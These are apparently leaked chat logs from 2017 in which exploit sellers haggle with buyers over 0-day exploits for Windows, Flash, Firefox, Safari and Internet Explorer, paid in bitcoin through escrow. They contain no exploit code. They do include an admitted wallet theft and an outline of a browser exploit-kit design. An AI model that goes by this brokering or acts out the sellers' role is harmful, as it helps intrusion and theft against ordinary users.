1019(19:16:38) thewizardofcc@jabbim.com: ok
1020(19:16:43) thewizardofcc@jabbim.com: and what do u have new?
1021(19:16:59) symlink40: windows LPE
1022(19:17:13) thewizardofcc@jabbim.com: how is it working ?
1023(19:17:18) symlink40: check here
1024(19:17:18) symlink40: # Video DEMO : https://www.youtube.com/watch?v=1_69QCKP_WA
1025# Screenshot : https://s23.postimg.org/p4bhqp7zf/Win_10_x64_LPE_2017_02_27.jpg
1026# Demo video showing exploit working on Windwos 10 + EMET + KIS2017
1027(19:17:32) thewizardofcc@jabbim.com: ok
1028(19:18:55) thewizardofcc@jabbim.com: what is price for lpe
1029(19:19:21) symlink40: 19000$ btc only
1030(19:19:38) thewizardofcc@jabbim.com: expensive I think
1031(19:19:46) thewizardofcc@jabbim.com: do u have a video for the adobe?
1032(19:20:12) symlink40: no
1033(19:20:21) symlink40: 19k is expensive for the LPE ?
1034(19:20:44) thewizardofcc@jabbim.com: I think
1035(19:20:53) symlink40: if you take 2 exploits I give good discounts
1036(19:20:54) thewizardofcc@jabbim.com: I don`t know what is price
1037(19:20:57) symlink40: what your last price ?
1038(19:21:13) thewizardofcc@jabbim.com: I have to think and I will let u know
1039(19:21:20) thewizardofcc@jabbim.com: the flash works for the last version ?
1040(19:21:47) symlink40: no
1041(19:21:50) symlink40: check screenshot
1042(19:22:26) symlink40: 18.0.0.x
1043(19:23:20) thewizardofcc@jabbim.com: it allow remote code? meterpreter ?
1044(19:24:00) thewizardofcc@jabbim.com: I don`t have the link for the adobe flash
1045(19:24:58) symlink40: ok
1046(19:25:00) symlink40: 1 moment
1047(19:25:22) symlink40: yes you can escalate into ability of remote code execution
1048(19:25:25) symlink40: here is
1049(19:25:25) symlink40: https://s28.postimg.org/5pk00o371/flash_0day_infoleak.jpg
1050(19:25:45) symlink40: with the firefox RCE exploit also you can mix them in 1 pack to get full exploit
1051(19:25:54) symlink40: here is firefox
1052(19:25:55) symlink40: https://s28.postimg.org/7wo8ol8h9/0day_firefox_RCE.png
1053(19:32:44) thewizardofcc@jabbim.com has gone away.
1054(19:40:08) thewizardofcc@jabbim.com is no longer away.
1055(19:41:13) thewizardofcc@jabbim.com: I offer 23k for windows LPE and adobe flash
1056(19:42:02) symlink40: you wanna buy them both ?
1057(19:42:13) symlink40: I can give discounts if you take buy them 2
1058(19:42:36) thewizardofcc@jabbim.com: sorry, I ment 13k for both
1059(19:43:05) symlink40: no problem that's why I told you that I provide discounts for buying 2 exploits
1060(19:43:14) symlink40: final prices is 13k . that's your limit ?
1061(19:43:21) thewizardofcc@jabbim.com: yes
1062(19:44:30) symlink40: bitcoin payment accepted ?
1063(19:44:39) thewizardofcc@jabbim.com: I have some conditions, first I need escrow service and second do you use any forum?
1064(19:44:54) thewizardofcc@jabbim.com: yes, btc
1065(19:44:56) symlink40: escrow is accepted
1066(19:44:58) symlink40: but
1067(19:45:15) symlink40: what's my guarante that admin will not take my code
1068(19:45:42) thewizardofcc@jabbim.com: do you use any forum for sales?
1069(19:45:46) symlink40: no
1070(19:45:57) symlink40: this is my first time going public
1071(19:46:10) symlink40: I used to dev exploits for specific needs for clients
1072(19:46:19) symlink40: im asking
1073(19:46:36) symlink40: what's my guarante that admin will not take my code ??
1074(19:47:06) thewizardofcc@jabbim.com: let me think
1075(19:48:48) symlink40: ok
1076(19:49:06) symlink40: if you wanna verify exploit before going to confirm
1077(19:49:25) symlink40: I can take small advanced btc and I send exploit source code. you verify and pay rest
1078(19:49:32) symlink40: this we earn each other trust
1079(19:49:39) symlink40: and I really like to work on future deals
1080
1081e2e4@creep.im/pc: hi
1082(18:32:44) Attempting to start a private conversation with e2e4@creep.im/pc...
1083(18:32:53) kernel12345: hey ?
1084(18:33:02) e2e4@creep.im has not been authenticated yet. You should authenticate (http://otr-help.cypherpunks.ca/authenticate.php?lang=en) this buddy.
1085(18:33:02) Unverified (http://otr-help.cypherpunks.ca/unverified.php?lang=en) conversation with e2e4@creep.im/pc started.
1086(18:34:16) e2e4@creep.im/pc: i found video
1087(18:34:23) e2e4@creep.im/pc: u have some exploits?
1088(18:34:26) kernel12345: Yes
1089(18:34:29) kernel12345: Win LPE ?
1090(18:34:46) e2e4@creep.im/pc: yep
1091(18:34:58) kernel12345: yes I have it
1092(18:35:06) kernel12345: you got message via jabber spam
1093(18:36:37) e2e4@creep.im/pc: via youtube video )
1094(18:36:47) kernel12345: yeah
1095(18:36:48) kernel12345: so
1096(18:36:53) kernel12345: what are you intrested in ?
1097(18:41:35) Private conversation with e2e4@creep.im/pc lost.
1098(18:41:38) Attempting to start a private conversation with e2e4@creep.im/pc...
1099(18:41:40) Unverified (http://otr-help.cypherpunks.ca/unverified.php?lang=en) conversation with e2e4@creep.im/pc started.
1100(18:41:47) kernel12345: what are you intrested in ?
1101(18:42:46) e2e4@creep.im/pc: LPE
1102(18:43:19) kernel12345: you okay with the price ?
1103(18:44:36) e2e4@creep.im/pc: i dont have any price from u
1104(18:44:46) kernel12345: I thought I written in prevouis message
1105(18:44:56) kernel12345: 18k $
1106(18:44:59) kernel12345: bitcoin only
1107(18:45:13) e2e4@creep.im/pc: escrow?
1108(18:45:21) kernel12345: wich site
1109(18:45:30) kernel12345: any assurance that admin will not re-sell my code ?
1110(18:45:34) e2e4@creep.im/pc: exploit.in
1111(18:45:44) kernel12345: guarante ?
1112(18:45:54) e2e4@creep.im/pc: yep
1113(18:46:08) e2e4@creep.im/pc: where are you from?
1114(18:46:14) kernel12345: not important
1115(18:46:23) kernel12345: never ask again for location ...
1116(18:46:35) kernel12345: we are here to do deals and not ask personnal questions !
1117(18:46:45) e2e4@creep.im/pc: ok
1118(18:46:57) kernel12345: so
1119(18:47:08) kernel12345: what's my guarante that admin will not take my code and re-sell again ?
1120(18:47:26) kernel12345: your money stay in escrow until deal is confirmed buy my code can be copied and sold\
1121(18:48:31) e2e4@creep.im/pc: ok, how to work your deal? u give exploit i give money?
1122(18:49:19) kernel12345: how do I know after I send your exploit src you will pay and not go offline ?
1123(18:49:24) kernel12345: many scammers around !!!
1124(18:50:25) e2e4@creep.im/pc: yep, but if your exploit is fake?
1125(18:50:56) kernel12345: I sell high quality exploit with long support for future deals and collaboration with buyers
1126(18:50:59) kernel12345: don't pay me full price
1127(18:51:04) kernel12345: if you are not trusting me
1128(18:51:34) kernel12345: you send advanced payment of your choice and I submit exploit . you verify and pay rest of money
1129(18:53:11) kernel12345: this way no one of get scammed and soon we finish this deal we earn trust and we don't have to worry on future work
1130(18:53:15) kernel12345: sounds good ?
1131(18:54:51) e2e4@creep.im/pc: yes
1132(18:56:34) kernel12345: ok
1133(18:57:02) kernel12345: how much is your perentage for the advanced payment and where should I upload exploit for you
1134(18:57:09) kernel12345: can I make zip and upload on sendspace ?
1135(18:57:43) e2e4@creep.im/pc: but send me please details via email
1136(18:57:51) e2e4@creep.im/pc: how to work? etc
1137(18:58:10) kernel12345: I don't understand
1138(18:58:19) kernel12345: what kind of details you want ?
1139(18:58:51) e2e4@creep.im/pc: ok, limitation, time of execution etc
1140(18:59:01) e2e4@creep.im/pc: technical details
1141(18:59:04) kernel12345: ok
1142(18:59:07) kernel12345: give me your email
1143(18:59:08) e2e4@creep.im/pc: shell code size
1144(18:59:59) kernel12345: give me your email ?
1145(19:00:01) e2e4@creep.im/pc: matvejchikov@gmail.com
1146(19:00:12) kernel12345: 1 moment
1147(19:05:10) kernel12345: check your inbox please
1148(19:06:57) e2e4@creep.im/pc: ok
1149(19:14:31) kernel12345: so
1150(19:14:32) kernel12345: ?
1151(19:27:02) e2e4@creep.im/pc: ok give me time
1152(19:27:13) kernel12345: how much time ?
1153(19:27:18) e2e4@creep.im/pc: tomorrow at same time u are here?
1154(19:27:26) kernel12345: Yes I will be here
1155(19:27:32) e2e4@creep.im/pc: ok nice
1156(19:27:50) kernel12345: you fully intrested in buying or tomorrow for thinking ?
1157(19:27:59) kernel12345: just asking to clear things my friend
1158(19:28:11) e2e4@creep.im/pc: for buying man
1159(19:28:18) kernel12345: ok that is good
1160
1161
1162 wukong@swissjabber.ch/60e31a21-744e-4f4c-8135-1604df4d4496: зривет
1163(2017-03-05 14:37:08) wukong@swissjabber.ch/60e31a21-744e-4f4c-8135-1604df4d4496: по 0day..
1164(16:11:25) wukong@swissjabber.ch has not been authenticated yet. You should authenticate (http://otr-help.cypherpunks.ca/authenticate.php?lang=en) this buddy.
1165(16:11:25) Unverified (http://otr-help.cypherpunks.ca/unverified.php?lang=en) conversation with wukong@swissjabber.ch/60e31a21-744e-4f4c-8135-1604df4d4496 started.
1166(16:23:17) kernel12345: hello
1167(16:23:23) kernel12345: english only
1168(16:23:26) kernel12345: I don't speak russian
1169(16:39:44) wukong@swissjabber.ch: ah, my bad...
1170(16:40:01) kernel12345: you speak english
1171(16:40:04) kernel12345: you said 0days ?
1172(16:40:04) wukong@swissjabber.ch: I saw you have Exploit jabber, thought you are Russian.
1173(16:40:19) kernel12345: I used xmpp spamm for my exploit
1174(16:40:20) wukong@swissjabber.ch: yeah, got your advertisement few days ago
1175(16:40:23) kernel12345: windows LPE exploit
1176(16:40:24) kernel12345: yeah
1177(16:40:45) wukong@swissjabber.ch: so the lowest $ you take is 25k?
1178(16:40:59) kernel12345: I can take less if you are a trusted buyer and I provide long term support
1179(16:41:07) kernel12345: what's your best price ?
1180(16:42:56) wukong@swissjabber.ch: I'll need to think about it... which escrow would you use?
1181(16:43:03) wukong@swissjabber.ch: are you on Exploit?
1182(16:43:41) kernel12345: no im not on exploit.in
1183(16:43:56) kernel12345: can you give me guarante that escrow admin will not re-sell my exploit code ?
1184(16:44:06) kernel12345: bitcoin payment only
1185(16:45:36) wukong@swissjabber.ch: I can't, but for prices like this there is no other option of doing business, someone has to compromise...
1186(16:45:47) wukong@swissjabber.ch: Are you on any other forums?
1187(16:46:00) kernel12345: compromise what ?
1188(16:46:02) kernel12345: no
1189(16:46:13) kernel12345: I need a guarante that escrow admins will not take code and re-sell it
1190(16:46:22) kernel12345: your money stays in escow until deal confirms
1191(16:46:55) wukong@swissjabber.ch: I mean there will alsways be a risk of escrow going rogue, but it's highly unlikely considering their reputation.
1192(16:47:13) kernel12345: yeah yeah
1193(16:47:15) wukong@swissjabber.ch: people do business with them for significantly higher $
1194(16:47:17) kernel12345: don't pay full price
1195(16:47:18) kernel12345: look
1196(16:47:24) kernel12345: are you a trusted buyer ?
1197(16:47:43) kernel12345: never pay full price until you verify exploit source code and check for validation
1198(16:47:58) wukong@swissjabber.ch: Define trusted :) I'm a member of Escrow and several other communities, including MAZA
1199(16:48:12) kernel12345: Ok good
1200(16:48:18) kernel12345: what's your best price for this exploit ?
1201(16:48:26) kernel12345: just say your best price and lets work a deal
1202(16:48:56) kernel12345: I really want get new buyers and let them be my clients for future deals and collaboration.
1203(16:49:38) wukong@swissjabber.ch: are you on any forums at all?
1204(16:49:50) kernel12345: no
1205(16:49:56) kernel12345: I hang out on IRC sometimes and jabber
1206(16:50:05) kernel12345: I work with private clients
1207(16:50:11) kernel12345: developing exploits for specific needs
1208(16:51:06) wukong@swissjabber.ch: Let me discuss with my partner, I'll get back to you by tomorrow.
1209(16:51:18) kernel12345: Ok
1210(16:51:23) kernel12345: I will be waiting for you reply
1211(16:51:34) kernel12345: do you need any details about exploit ? questions
1212
1213
1214support_blaze@xmpp.jp on Thu Mar 2 01:58:59 2017:
1215(01:59:05) Attempting to start a private conversation with support_blaze@xmpp.jp...
1216(01:59:09) Attempting to start a private conversation with support_blaze@xmpp.jp/Psi+...
1217(01:59:10) Unverified conversation with support_blaze@xmpp.jp/Psi+ started.
1218(01:59:12) kernel12345: hi
1219(01:59:13) Successfully refreshed the unverified conversation with support_blaze@xmpp.jp/Psi+.
1220(01:59:15) kernel12345: hi
1221(01:59:19) kernel12345: sorry network down
1222(01:59:25) kernel12345: resend your messages please.
1223(01:59:34) support_blaze@xmpp.jp: ok
1224(02:00:33) kernel12345: you said tv
1225(02:00:39) kernel12345: teamviewer
1226(02:00:45) support_blaze@xmpp.jp: yes
1227(02:00:49) kernel12345: I prefer making the small deposit we agree
1228(02:00:54) kernel12345: you make any price you want
1229(02:01:01) support_blaze@xmpp.jp: 10$
1230(02:01:03) kernel12345: lol
1231(02:01:06) kernel12345: you kidding bro
1232(02:01:07) support_blaze@xmpp.jp: jk lol
1233(02:01:10) kernel12345: hahaha
1234(02:01:10) support_blaze@xmpp.jp: xD
1235(02:01:12) kernel12345: nice one
1236(02:01:29) kernel12345: I thought you said 10.000$ you forgot to type the 000 haha
1237(02:01:30) kernel12345: jk
1238(02:01:42) support_blaze@xmpp.jp: lol
1239(02:01:49) kernel12345: so 2k ?
1240(02:02:09) support_blaze@xmpp.jp: can u link me to ur exploit.in profile?
1241(02:02:17) kernel12345: im not on exploit.in bro
1242(02:02:22) kernel12345: I told you first no forums
1243(02:02:57) kernel12345: you still afraid of me being a scammer ?
1244(02:03:07) support_blaze@xmpp.jp: yes
1245(02:03:27) kernel12345: I don't know why but you offerd me 2k first and I was shocked when you said that this could be a scam
1246(02:03:34) kernel12345: I see 2k is not a big deal for you
1247(02:03:46) kernel12345: you only test people with it if they took it is worth nothing
1248(02:03:53) kernel12345: im right ?
1249(02:04:01) support_blaze@xmpp.jp: money is money
1250(02:04:12) support_blaze@xmpp.jp: even if i lose a dollar i would cry
1251(02:04:29) kernel12345: did you cry when that fucker stole 14k?
1252(02:04:34) kernel12345: just joking
1253(02:04:38) kernel12345: jk
1254(02:04:56) support_blaze@xmpp.jp: lol, yes
1255(02:04:59) support_blaze@xmpp.jp: i did :\
1256(02:05:02) kernel12345: no you kidding
1257(02:05:02) support_blaze@xmpp.jp: on the inside
1258(02:05:06) kernel12345: yeah
1259(02:05:09) support_blaze@xmpp.jp: im serious
1260(02:05:13) support_blaze@xmpp.jp: i did send him 14 k
1261(02:05:19) support_blaze@xmpp.jp: u can ask him
1262(02:05:21) kernel12345: I like to trust people in a while
1263(02:05:24) support_blaze@xmpp.jp: and hopefully he will reply
1264(02:05:30) support_blaze@xmpp.jp: before he blocks u
1265(02:05:32) kernel12345: I will soon he gets online and if he blocks me
1266(02:05:38) kernel12345: I will 100% know that his real name
1267(02:05:48) support_blaze@xmpp.jp: k
1268(02:05:50) kernel12345: I can see
1269(02:06:04) kernel12345: why you are afraid .. because you already got ripped
1270
1271
1272---
1273
1274
1275(02:15:24) Attempting to start a private conversation with support_blaze@xmpp.jp...
1276(02:15:32) Unverified (http://otr-help.cypherpunks.ca/unverified.php?lang=en) conversation with support_blaze@xmpp.jp/Psi+ started.
1277(02:15:38) kernel12345: you still there friend ?
1278(02:15:44) support_blaze@xmpp.jp: ?
1279(02:15:49) support_blaze@xmpp.jp: yes
1280(02:15:56) kernel12345: my network keeps going down
1281(02:16:02) kernel12345: that's why I ask if you still ther
1282(02:16:04) kernel12345: there*
1283(02:16:33) support_blaze@xmpp.jp: oh
1284(02:16:58) support_blaze@xmpp.jp: i see
1285(02:17:06) kernel12345: so
1286(02:17:09) kernel12345: what do you think
1287(02:17:44) kernel12345: I accept 2k and I wanna sell to you execlusively I can say I trust you since we talk than any other buyer
1288(02:18:20) support_blaze@xmpp.jp: everyone i bought stuff off of has shown me proof.... the most recent exploit i bought was
1289(02:18:21) support_blaze@xmpp.jp: 2017 MSIE
1290(02:18:26) support_blaze@xmpp.jp: andJava
1291(02:18:49) kernel12345: lets get this straight
1292(02:18:51) kernel12345: because bro
1293(02:18:57) kernel12345: we wasted a lot of time talking
1294(02:19:12) support_blaze@xmpp.jp: ok
1295(02:19:14) kernel12345: after your offer . I submit code you verify and you pay full price ?
1296(02:19:18) kernel12345: that's good for you ?
1297(02:19:59) kernel12345: paying full price after my submit of code is what I care about and afraid of you going offline after I submit code ?
1298(02:22:16) support_blaze@xmpp.jp: ill be back soon
1299(02:22:26) kernel12345: how much time ?
1300(02:22:30) support_blaze@xmpp.jp: im going out to eat
1301(02:22:30) support_blaze@xmpp.jp: ok?
1302(02:22:54) kernel12345: I just wanna know your reply before I go to bed bro .
1303(02:23:01) support_blaze@xmpp.jp: 1-1.5 hrs
1304(02:23:06) kernel12345: I will be sleeping
1305(02:23:10) support_blaze@xmpp.jp: im going to cheesecake facotry
1306(02:23:11) support_blaze@xmpp.jp: ok
1307(02:23:13) kernel12345: what time is there ?
1308(02:23:22) support_blaze@xmpp.jp: somewhere around 7
1309(02:23:27) support_blaze@xmpp.jp: here in California
1310(02:23:30) kernel12345: oh
1311(02:23:32) kernel12345: okay
1312(02:23:51) kernel12345: ok
1313(02:23:59) kernel12345: reply me tomorrow ?
1314(02:24:07) support_blaze@xmpp.jp: yes
1315(02:24:16) kernel12345: I hope is a good reply :)
1316(02:24:34) support_blaze@xmpp.jp: ok i have to go now..
1317(02:24:40) kernel12345: have a good day
1318(02:24:42) support_blaze@xmpp.jp has signed off.
1319(2017-03-03 00:30:45) support_blaze@xmpp.jp has signed on.
1320(00:36:21) support_blaze@xmpp.jp: did u talk to him?
1321(00:37:01) kernel12345: hi
1322(00:37:07) kernel12345: how are you friend >
1323(00:37:15) kernel12345: I sent him a msg on both jabbers
1324(00:37:17) support_blaze@xmpp.jp: what did the guy say?
1325(00:37:18) kernel12345: seems offline
1326(00:37:22) support_blaze@xmpp.jp: oh
1327(00:37:24) kernel12345: nothing he's offline
1328(00:37:29) support_blaze@xmpp.jp: k
1329(00:37:39) kernel12345: I thought he will reply and I send him his name
1330(00:37:43) kernel12345: and see what his reaction
1331(00:37:57) kernel12345: you code in php very well ?
1332(00:38:23) support_blaze@xmpp.jp: yes
1333(00:38:23) support_blaze@xmpp.jp: i do
1334(00:38:40) kernel12345: im working on safari exploit and need a server side for checking payloads I have already coded the full part . I need only php script to check payload of it was deliverd to browser
1335(00:38:44) kernel12345: like system callback
1336(00:38:46) kernel12345: to check
1337(00:38:47) kernel12345: status
1338(00:38:51) kernel12345: = failed
1339= success
1340(00:38:54) support_blaze@xmpp.jp: u mean like to check
1341(00:38:59) kernel12345: yes
1342(00:38:59) support_blaze@xmpp.jp: if it was exploited?
1343(00:39:02) support_blaze@xmpp.jp: i can do that
1344(00:39:08) kernel12345: no only check if it was deliver
1345(00:39:16) support_blaze@xmpp.jp: yea thats simple
1346(00:39:18) support_blaze@xmpp.jp: i can do that
1347(00:39:31) support_blaze@xmpp.jp: and i have a safari exploit :(
1348(00:39:32) kernel12345: I have this client paying me 8k for this bug and I don't wanna lose this deal
1349(00:39:35) kernel12345: you to ?
1350(00:39:36) kernel12345: lol
1351(00:39:38) support_blaze@xmpp.jp: just no ASLR bypass shellcode
1352(00:39:41) support_blaze@xmpp.jp: oh no
1353(00:39:41) kernel12345: wich version
1354(00:39:42) kernel12345: ?
1355(00:39:47) support_blaze@xmpp.jp: 2016 explit
1356(00:39:49) support_blaze@xmpp.jp: its not 0day
1357(00:39:57) kernel12345: mine is 10.0.3
1358(00:40:01) support_blaze@xmpp.jp: oh
1359(00:40:02) kernel12345: with cve
1360(00:40:02) kernel12345: ?
1361(00:40:05) support_blaze@xmpp.jp: yes
1362(00:40:07) kernel12345: or just src patched ?
1363(00:40:09) kernel12345: lol fuck CVE
1364(00:40:14) support_blaze@xmpp.jp: :\
1365(00:40:14) kernel12345: mine is priv
1366(00:40:21) support_blaze@xmpp.jp: u have any Ie ones?
1367(00:40:25) kernel12345: le
1368(00:40:25) support_blaze@xmpp.jp: MSIE?
1369(00:40:26) kernel12345: ?
1370(00:40:32) support_blaze@xmpp.jp: Internet Explorer ?
1371(00:40:43) kernel12345: IE ?
1372(00:40:47) support_blaze@xmpp.jp: yes
1373(00:40:53) kernel12345: I have 1
1374(00:41:02) kernel12345: but got it from friend who didn't got contact to sell
1375(00:41:03) support_blaze@xmpp.jp: what version does it work at?
1376(00:41:05) kernel12345: I have src and demo video
1377(00:41:08) kernel12345: let me check
1378(00:41:10) support_blaze@xmpp.jp: can i see video?
1379(00:41:13) support_blaze@xmpp.jp: oh k
1380(00:41:19) kernel12345: where do you want me to upload it ?
1381(00:41:30) kernel12345: sendspace is okay . I create zip and inside video poc
1382(00:41:30) support_blaze@xmpp.jp: sendvid
1383(00:41:41) kernel12345: sendspace is secure I think
1384(00:41:46) kernel12345: we are not steaming
1385(00:41:49) support_blaze@xmpp.jp: http://sendvid.com/
1386(00:41:50) support_blaze@xmpp.jp: use this
1387(00:41:52) kernel12345: ok
1388(00:41:53) kernel12345: 1 sec
1389(00:41:57) support_blaze@xmpp.jp: im not going to open a mp3 file lol :D
1390(00:41:59) kernel12345: needs account ?
1391(00:42:03) support_blaze@xmpp.jp: no
1392(00:42:05) kernel12345: lol
1393(00:42:07) kernel12345: ok 1 sec
1394(00:42:08) kernel12345: yeah
1395(00:42:13) kernel12345: good choice
1396(00:42:17) kernel12345: I always open files from people
1397(00:43:37) kernel12345: uploading to sendvid
1398(00:47:06) kernel12345: dafuck is this site
1399(00:47:15) kernel12345: 4mb video takes a lot to upload ?
1400(00:47:53) kernel12345: IE 0day RCE is being prepared for processing.
1401
1402
1403(00:52:38) kernel12345: you here ?
1404(00:52:38) kernel12345: http://sendvid.com/rhtlhf92
1405(00:52:40) kernel12345: her eis
1406(00:52:44) kernel12345: here is *
1407(00:53:23) kernel12345: Execute arbitrary commands
1408Exploit in the memory corruption error when instantiating "Msdds.dll" object as an ActiveX control
1409could be exploited = to take complete control of affected system via a specially crafted webpage
1410
1411(00:57:40) support_blaze@xmpp.jp has signed off.
1412(00:58:48) support_blaze@xmpp.jp has signed on.
1413(01:02:32) kernel12345: hi
1414(01:02:39) support_blaze@xmpp.jp: yes video?
1415(01:02:46) kernel12345: I sent you
1416(01:02:47) kernel12345: link
1417(01:02:49) kernel12345: you got ?
1418(01:03:00) kernel12345: (00:52:38) kernel12345: http://sendvid.com/rhtlhf92
1419(00:52:40) kernel12345: her eis
1420(00:52:44) kernel12345: here is *
1421(00:53:23) kernel12345: Execute arbitrary commands
1422Exploit in the memory corruption error when instantiating "Msdds.dll" object as an ActiveX control
1423could be exploited = to take complete control of affected system via a specially crafted webpage
1424
1425(01:10:11) kernel12345: your safari exploit can do URL spoofing ?
1426(01:10:28) support_blaze@xmpp.jp: no
1427(01:10:33) kernel12345: im working on fake pop by adding payload from external host :p
1428(01:10:34) support_blaze@xmpp.jp: no need for url spoof
1429(01:10:48) kernel12345: url spoofing is good for spearphishing
1430(01:10:56) kernel12345: stoled one btc wallet one time with it
1431(01:10:59) kernel12345: but no email haha
1432(01:11:09) kernel12345: the guy had 150#
1433(01:11:12) kernel12345: 150$ lol
1434(01:11:31) kernel12345: can I ask you
1435(01:11:35) support_blaze@xmpp.jp: yea sure
1436(01:11:52) kernel12345: did you been into sending from blockchain wallet and no 3 confirmations showed up
1437(01:11:55) kernel12345: after 8 hours ?
1438(01:12:06) support_blaze@xmpp.jp: what?
1439(01:12:25) support_blaze@xmpp.jp: ?
1440(01:12:41) kernel12345: like you send transfer from blockchain
1441(01:12:48) kernel12345: and when you come to see 3 confirmations of transaction
1442(01:12:50) kernel12345: nothing show
1443(01:13:05) support_blaze@xmpp.jp: yea sometimes it takes time
1444(01:13:07) kernel12345: I made transaction this morning and been 8 hours and still 0/3 confirmations
1445(01:13:18) kernel12345: how long maximum will take ?
1446(01:13:42) kernel12345: motha fuckers asking for big fee for making it quick .. one time I paid 20$ fee and it was done in less than 9 minutes
1447(01:13:55) support_blaze@xmpp.jp: oh i have no idea sometimes it takes time
1448(01:14:09) kernel12345: ok
1449(01:14:12) kernel12345: you got video ?
1450(01:15:36) support_blaze@xmpp.jp: yea
1451(01:15:44) kernel12345: can you get me a buyer
1452(01:15:48) kernel12345: im selling for cheap
1453(01:15:57) kernel12345: can't even know how this guy coded it
1454(01:16:01) kernel12345: 5k
1455(01:16:05) support_blaze@xmpp.jp: u realize u could make more lol
1456(01:16:25) kernel12345: yeah but im busy working for a full exploit pack of browser exploits
1457(01:16:35) kernel12345: firefox and old chrome bug and this safari
1458(01:17:59) kernel12345: I had idea for a big project of a browser exploitation .. first you detect what target browser using and a script pulls ballback request showing headers and you pick also the exploit for the browser version and check in and by remote adding payload you can remotely control it
1459(01:18:06) kernel12345: needs time and some resoureces
1460(01:18:24) kernel12345: saudi arabia company intrested in it but they require meeting face to face !
1461(01:18:39) kernel12345: they will fund project with 70.000$ budget
1462(01:20:45) kernel12345: going to bed
1463(01:20:48) kernel12345: goodbye friend
1464(01:21:07) support_blaze@xmpp.jp: I had idea for a big project of a browser exploitation .. first you detect what target browser using and a script pulls ballback request showing headers and you pick also the exploit for the browser version and check in and by remote adding payload you can remotely control it
1465(01:21:11) support_blaze@xmpp.jp: dude lol its not hard :\
1466(01:21:21) support_blaze@xmpp.jp: u just prase the useragent
1467(01:21:23) kernel12345: is not hard but requires some work
1468(01:21:27) support_blaze@xmpp.jp: and u can detect OS like that :\
1469(01:21:33) kernel12345: im just giving you full idea
1470(01:21:36) kernel12345: that's all
1471(01:21:51) kernel12345: I have the exploits and coded some script and need to finish all then move into real testing
1472(01:22:23) kernel12345: anyway
1473(01:22:28) kernel12345: have a great day!
1474(01:22:36) kernel12345: talk later if you want.
1475(01:22:40) Private conversation with support_blaze@xmpp.jp/Psi+ lost.
1476(03:04:23) support_blaze@xmpp.jp has signed on.
1477(16:28:54) support_blaze@xmpp.jp has signed on.
1478(18:00:11) support_blaze@xmpp.jp has signed off.
1479
1480
1481Alexander Alexander on Wed Mar 1 10:59:26 2017:
1482(10:59:28) Attempting to start a private conversation with sc1roka@exploit.im...
1483(10:59:28) sc1roka@exploit.im has not been authenticated yet. You should authenticate this buddy.
1484(10:59:29) Unverified conversation with sc1roka@exploit.im/xtpdcman started.
1485(10:59:32) kernel12345: hello
1486(10:59:36) sc1roka@exploit.im: hi man
1487(10:59:42) sc1roka@exploit.im: nice to meet you
1488(10:59:46) sc1roka@exploit.im: how u doing today
1489(10:59:47) sc1roka@exploit.im: ?
1490(11:00:10) kernel12345: all good.
1491(11:00:24) sc1roka@exploit.im: so friend
1492(11:00:29) kernel12345: yes ?
1493(11:00:30) sc1roka@exploit.im: since you have hot 0 day
1494(11:00:44) sc1roka@exploit.im: so why did you upload the video on youtube
1495(11:00:47) kernel12345: you are the guy who contacted me via gmail . alexander ?
1496(11:00:49) sc1roka@exploit.im: uploading video on youtube
1497(11:00:53) kernel12345: video proof only
1498(11:00:56) sc1roka@exploit.im: not seems profesitional
1499(11:01:04) kernel12345: relax .. video is not gonna get it patched
1500(11:01:06) sc1roka@exploit.im: yes bro i am alexander
1501(11:01:11) sc1roka@exploit.im: now
1502(11:01:19) kernel12345: yes ?
1503(11:01:28) sc1roka@exploit.im: how will u deal this exploit
1504(11:01:29) sc1roka@exploit.im: faceto face
1505(11:01:30) sc1roka@exploit.im: ?
1506(11:01:33) kernel12345: no
1507(11:01:38) kernel12345: no real life meeting
1508(11:01:44) sc1roka@exploit.im: then how
1509(11:01:45) sc1roka@exploit.im: ?
1510(11:01:49) kernel12345: aree you exploit developer ?
1511(11:01:54) sc1roka@exploit.im: yes
1512(11:01:54) kernel12345: or researcher
1513(11:02:00) sc1roka@exploit.im: i m researcher
1514(11:02:06) sc1roka@exploit.im: working for top client
1515(11:02:08) kernel12345: exploit developer and you want meet face to face
1516(11:02:11) kernel12345: not risking
1517(11:02:18) sc1roka@exploit.im: i dont have any problem
1518(11:02:20) kernel12345: never meet a person for 0day deals
1519(11:02:22) sc1roka@exploit.im: its all depend on u
1520(11:02:28) sc1roka@exploit.im: no problem man
1521(11:02:30) kernel12345: are you okay with the price
1522(11:02:36) sc1roka@exploit.im: how much u asking
1523(11:02:36) sc1roka@exploit.im: ?
1524(11:02:43) kernel12345: 35.000$
1525(11:02:50) sc1roka@exploit.im: u mean 35 k usd
1526(11:02:51) sc1roka@exploit.im: ?
1527(11:02:55) kernel12345: yes
1528(11:03:04) kernel12345: that why I asked you if you are happy with the price
1529(11:03:11) kernel12345: bitcoin payment is okay for you ?
1530(11:03:19) sc1roka@exploit.im: yes
1531(11:03:25) sc1roka@exploit.im: bitcoin is not a problem
1532(11:03:30) kernel12345: so the price is not a problem also ?
1533(11:03:41) sc1roka@exploit.im: price we will do some small negotiaon
1534(11:03:58) kernel12345: ok
1535(11:04:01) kernel12345: start now
1536(11:04:30) kernel12345: so if this deal confirms we make payment now and you get full exploit source code so I can tell other buyers it was sold
1537(11:04:59) sc1roka@exploit.im: 1)i dont trust escrow
1538(11:05:16) sc1roka@exploit.im: 2)i will send some % of payment as a gurantee in advance
1539(11:05:25) sc1roka@exploit.im: 3)you have to answer our question first
1540(11:05:27) kernel12345: same some admins take source code and re-sell to people
1541(11:05:32) kernel12345: yes
1542(11:05:34) kernel12345: go a head man
1543(11:05:38) sc1roka@exploit.im: 1 sec
1544(11:05:43) kernel12345: ok
1545(11:05:55) sc1roka@exploit.im: 1. Which software products are affected?
1546
1547Â 2. Are there any additional hardware or software dependencies?
1548
1549Â 3. Please briefly describe an example exploitation scenario.
1550
1551Â 4. What are the mitigating factors, if any?
1552
1553Â 5. What platforms are already supported by the exploit? What platforms could be supported?
1554
15556. What is the typical rate of success for the exploit? Could this be improved and if so, under what conditions?
1556
15577. If the exploitation attempt was unsuccessful, please briefly describe the state the system is left in.
1558
1559Â 8. What other parties possess knowledge of this vulnerability?
1560
1561
1562(11:06:18) kernel12345: that's not 1 question
1563(11:06:22) kernel12345: haha
1564(11:06:23) kernel12345: okay
1565(11:06:28) sc1roka@exploit.im: thanks bro
1566(11:06:31) kernel12345: let me copy paste into notepad and write answers
1567(11:06:35) sc1roka@exploit.im: pls understand we are serious buyer
1568(11:06:45) sc1roka@exploit.im: i have 3-4 0 day as well
1569(11:06:47) sc1roka@exploit.im: in hand
1570(11:06:49) kernel12345: I have 1 question
1571(11:06:51) sc1roka@exploit.im: but we buy only
